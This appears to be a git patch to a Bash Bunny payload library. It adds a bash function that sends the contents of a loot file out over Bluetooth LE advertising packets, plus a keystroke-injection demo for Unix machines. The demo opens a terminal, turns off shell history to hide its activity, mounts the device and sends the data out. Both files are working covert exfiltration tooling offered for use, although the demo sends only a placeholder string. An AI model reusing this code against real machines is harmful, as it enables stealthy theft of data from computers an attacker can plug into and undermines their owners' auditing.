From b59823da1e59aa9dbb3514fda8ff13f57fbf71a0 Mon Sep 17 00:00:00 2001
From: drapl0n <87269662+drapl0n@users.noreply.github.com>
Date: Tue, 3 May 2022 03:17:53 +0530
Subject: [PATCH] Uploading BLE_EXFIL extension (#519)

* Uploaded BunnyLogger

* uploading payload intel

* Create README.md

* Update README.md

* uploaded LinuxPreter

* uploaded FileRipper

Faster executing version

* Update README.md

* fixing typo

* uploaded sudoSnatch

* Update README.md

* deleting sudoSnatch

* uploading payload

* Delete payload.sh

* Delete shell

* Delete systemBus

* Delete camPeek directory

* Update payload.sh

* Update payload.sh

* Delete payloads/library/execution/FileRipper directory

* Update payload.sh

* Update payload.sh

* Update payload.sh

* Update payload.sh

* uploading BLE_EXFIL extension

BLE_EXFIL extension, exfiltrates data via BLE

* BLE_EXFIL demo
---
 payloads/extensions/ble_exfil.sh              | 16 +++++++
 .../exfiltration/BLE_EXFIL_DEMO/payload.txt   | 47 +++++++++++++++++++
 2 files changed, 63 insertions(+)
 create mode 100644 payloads/extensions/ble_exfil.sh
 create mode 100644 payloads/library/exfiltration/BLE_EXFIL_DEMO/payload.txt

diff --git a/payloads/extensions/ble_exfil.sh b/payloads/extensions/ble_exfil.sh
new file mode 100644
index 00000000..47f5ce3d
--- /dev/null
+++ b/payloads/extensions/ble_exfil.sh
@@ -0,0 +1,16 @@
+#!/bin/bash
+#
+# BLE_EXFIL v1 by @drapl0n
+# Exfiltrate data(25 bytes) stored in "/loot/ble_exfil.txt" via BLE.
+# Usage: BLE_EXFIL
+
+function BLE_EXFIL() {
+    stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost 
+    stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost 
+    sleep 1
+    text=$(cat /root/udisk/loot/ble_exfil.txt)
+    exfil=${text:0:25}
+    echo -n -e "AT+ADVDAT=$exfil" > /dev/ttyS1
+}
+
+export -f BLE_EXFIL
diff --git a/payloads/library/exfiltration/BLE_EXFIL_DEMO/payload.txt b/payloads/library/exfiltration/BLE_EXFIL_DEMO/payload.txt
new file mode 100644
index 00000000..35e9dcac
--- /dev/null
+++ b/payloads/library/exfiltration/BLE_EXFIL_DEMO/payload.txt
@@ -0,0 +1,47 @@
+# Description: Demonstration of BLE_EXFIL extension.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Exfiltration
+# Target: Unix-like operating systems.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [Advertising Data]
+Q STRING echo BashBunnyRocks \> '$mntt'/loot/ble_exfil.txt
+Q ENTER
+BLE_EXFIL
+Q DELAY 200
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH